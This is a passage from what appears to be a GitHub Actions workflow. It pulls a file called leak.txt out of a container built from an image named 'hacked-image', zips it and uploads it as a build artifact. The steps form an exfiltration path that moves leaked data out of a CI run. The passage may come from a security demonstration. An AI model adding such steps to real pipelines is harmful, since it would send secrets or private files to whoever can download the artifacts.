- name: Create container to extract leak
      run: |
        container_id=$(docker create hacked-image)
        docker cp $container_id:/leak.txt ./leak.txt || echo "leak.txt not found"
        docker rm $container_id

    - name: Archive leak file
      run: |
        zip leak.zip leak.txt || echo "No file to zip"

    - name: Upload leaked data
      uses: actions/upload-artifact@v3
      with:
        name: leak-artifact
        path: leak.zip
